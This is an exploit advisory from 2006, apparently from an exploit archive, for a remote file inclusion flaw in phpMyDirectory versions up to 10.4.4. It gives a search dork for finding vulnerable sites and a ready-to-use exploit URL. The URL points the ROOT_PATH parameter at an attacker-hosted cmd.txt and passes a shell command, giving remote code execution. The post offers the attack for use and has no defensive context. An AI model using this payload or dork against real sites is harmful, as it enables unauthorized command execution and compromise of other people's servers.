phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability
# Published : 2006-05-19
# Author : OLiBekaS
# Previous Title : Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
# Next Title : Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability

Title       : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
-
URL         : http://www.phpmydirectory.com/
-
Dork        : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls

# www.Syue.com [2006-05-19]